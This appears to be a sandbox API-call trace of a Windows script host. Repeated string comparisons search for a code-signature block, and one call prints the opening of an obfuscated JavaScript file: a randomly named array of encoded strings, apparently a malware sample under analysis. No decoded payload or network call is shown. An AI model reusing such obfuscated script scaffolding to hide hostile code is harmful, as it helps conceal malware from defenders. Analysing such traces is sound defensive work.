	[0084.128] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0084.128] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.128] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0084.128] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.128] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0084.128] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0084.128] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0084.128] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0084.128] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.128] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0084.128] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0084.128] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.128] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0084.129] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0084.129] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.129] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0084.129] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0084.129] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0084.129] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0084.129] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0084.129] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0084.129] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0084.129] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0084.129] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0084.129] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.129] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0084.129] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.129] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.129] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0084.129] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0084.129] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.129] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0084.129] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.129] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.129] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0084.129] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.129] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0084.129] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0084.129] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.129] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0084.129] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0084.129] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0084.129] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0084.129] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0084.129] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0084.129] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0084.129] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0084.129] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.129] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0084.129] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0084.129] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.129] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0084.130] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0084.130] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.130] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0084.130] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0084.130] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0084.130] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0084.130] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0084.130] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0084.130] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.130] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.130] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0084.130] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0084.130] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0084.130] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0084.130] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0084.130] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0084.130] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.130] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0084.130] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0084.130] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0084.130] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0084.130] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.130] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0084.130] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0084.130] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0084.130] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0084.130] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0084.130] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0084.130] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0084.130] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0084.130] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0084.130] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0084.130] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0084.130] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0084.132] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0084.132] CloseCodeAuthzLevel () returned 0x1
	[0084.132] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0084.132] ??2@YAPEAX_K@Z () returned 0x30ee30
	[0084.133] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0084.133] GetProcessHeap () returned 0x330000
	[0084.133] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x368430, Size=0x11238) returned 0x39a5e0
	[0084.134] ??2@YAPEAX_K@Z () returned 0x30eec0
	[0084.134] GetCurrentThreadId () returned 0xb28
	[0084.134] realloc (_Block=0x0, _Size=0xc8) returned 0x30ef20
	[0084.134] ??2@YAPEAX_K@Z () returned 0x30eff0
	[0084.134] malloc (_Size=0x1008) returned 0x309f30
	[0084.134] ??2@YAPEAX_K@Z () returned 0x30f030
	[0084.134] malloc (_Size=0x108) returned 0x307d80
	[0084.135] malloc (_Size=0x208) returned 0x30f1e0
	[0084.135] malloc (_Size=0x200) returned 0x30f3f0
	[0084.135] malloc (_Size=0x408) returned 0x30f600
	[0084.135] malloc (_Size=0x2008) returned 0x30af40
	[0084.135] malloc (_Size=0x808) returned 0x30cf50
	[0084.136] malloc (_Size=0x1008) returned 0x30d760
	[0084.137] malloc (_Size=0x4008) returned 0x43dfd0
	[0084.137] malloc (_Size=0x2008) returned 0x441fe0
	[0084.233] malloc (_Size=0x4008) returned 0x443ff0
	[0084.721] ??2@YAPEAX_K@Z () returned 0x30efa0
	[0084.722] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefec0a1b0, pUnk=0x30efa0, riid=0x7fee1476340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x30efd8 | out: pdwCookie=0x30efd8*=0x100) returned 0x0
	[0084.722] CObjectContext::AddRef () returned 0x2
	[0084.722] CObjectContext::Release () returned 0x1
	[0084.722] ??2@YAPEAX_K@Z () returned 0x47fe90
	[0084.722] ??2@YAPEAX_K@Z () returned 0x30f940
	[0084.722] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ef98 | out: ppv=0x22ef98*=0x34f420) returned 0x0
	[0084.722] IUnknown:Release (This=0x34f420) returned 0x1
	[0084.723] ??2@YAPEAX_K@Z () returned 0x30fa00
	[0084.723] ISystemDebugEventFire:IsActive (This=0x3675b0) returned 0x1
	[0084.723] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ef38 | out: ppv=0x22ef38*=0x34f420) returned 0x0
	[0084.723] IUnknown:Release (This=0x34f420) returned 0x1
	[0084.724] malloc (_Size=0x2e48) returned 0x309f30
	[0084.724] GetCurrentThreadId () returned 0xb28
	[0084.724] ??2@YAPEAX_K@Z () returned 0x30fae0
	[0084.725] ??2@YAPEAX_K@Z () returned 0x30fbc0
	[0084.725] malloc (_Size=0x208) returned 0x30fca0
	[0084.726] ??2@YAPEAX_K@Z () returned 0x30d190
	[0084.726] ??2@YAPEAX_K@Z () returned 0x30db10
	[0084.726] ??2@YAPEAX_K@Z () returned 0x30feb0
	[0084.727] ??2@YAPEAX_K@Z () returned 0x30ff30
	[0084.727] ??2@YAPEAX_K@Z () returned 0x30e490
	[0084.727] malloc (_Size=0x20) returned 0x30e780
	[0084.727] malloc (_Size=0x288) returned 0x30e7b0
	[0084.727] realloc (_Block=0x0, _Size=0x140) returned 0x480810
	[0084.728] realloc (_Block=0x30e780, _Size=0x40) returned 0x30ea40
	[0084.728] realloc (_Block=0x480810, _Size=0x280) returned 0x480810
	[0084.728] malloc (_Size=0x508) returned 0x480aa0
	[0084.728] realloc (_Block=0x30ea40, _Size=0x80) returned 0x480fb0
	[0084.728] realloc (_Block=0x480810, _Size=0x500) returned 0x481040
	[0084.728] malloc (_Size=0xa08) returned 0x481550
	[0084.728] realloc (_Block=0x480fb0, _Size=0x100) returned 0x480810
	[0084.728] realloc (_Block=0x481040, _Size=0xa00) returned 0x481f60
	[0084.728] malloc (_Size=0x1408) returned 0x43dfd0
	[0084.729] realloc (_Block=0x480810, _Size=0x200) returned 0x480810
	[0084.729] realloc (_Block=0x481f60, _Size=0x1400) returned 0x43f3e0
	[0084.729] ??2@YAPEAX_K@Z () returned 0x480fb0
	[0084.730] ??2@YAPEAX_K@Z () returned 0x480a20
	[0084.730] ??2@YAPEAX_K@Z () returned 0x481090
	[0084.730] malloc (_Size=0x80) returned 0x481140
	[0084.730] malloc (_Size=0x108) returned 0x307d80
	[0084.731] ??2@YAPEAX_K@Z () returned 0x4811d0
	[0084.731] malloc (_Size=0x18) returned 0x30ffb0
	[0084.732] ??2@YAPEAX_K@Z () returned 0x4812b0
	[0084.733] ??2@YAPEAX_K@Z () returned 0x481f60
	[0084.733] malloc (_Size=0x80) returned 0x481360
	[0084.733] malloc (_Size=0x108) returned 0x307e90
	[0084.733] ??2@YAPEAX_K@Z () returned 0x481480
	[0084.737] ??2@YAPEAX_K@Z () returned 0x482250
	[0084.738] ??2@YAPEAX_K@Z () returned 0x482330
	[0084.738] ??2@YAPEAX_K@Z () returned 0x4823b0
	[0084.738] malloc (_Size=0x80) returned 0x482460
	[0084.738] malloc (_Size=0x108) returned 0x3080b0
	[0084.739] ??2@YAPEAX_K@Z () returned 0x482700
	[0084.739] malloc (_Size=0x18) returned 0x481530
	[0084.739] ??2@YAPEAX_K@Z () returned 0x4827e0
	[0084.739] ??2@YAPEAX_K@Z () returned 0x482860
	[0084.739] malloc (_Size=0x80) returned 0x482910
	[0084.740] malloc (_Size=0x108) returned 0x3081c0
	[0084.740] ??2@YAPEAX_K@Z () returned 0x4829a0
	[0084.740] malloc (_Size=0x30) returned 0x30ea40
	[0084.741] ??2@YAPEAX_K@Z () returned 0x482a80
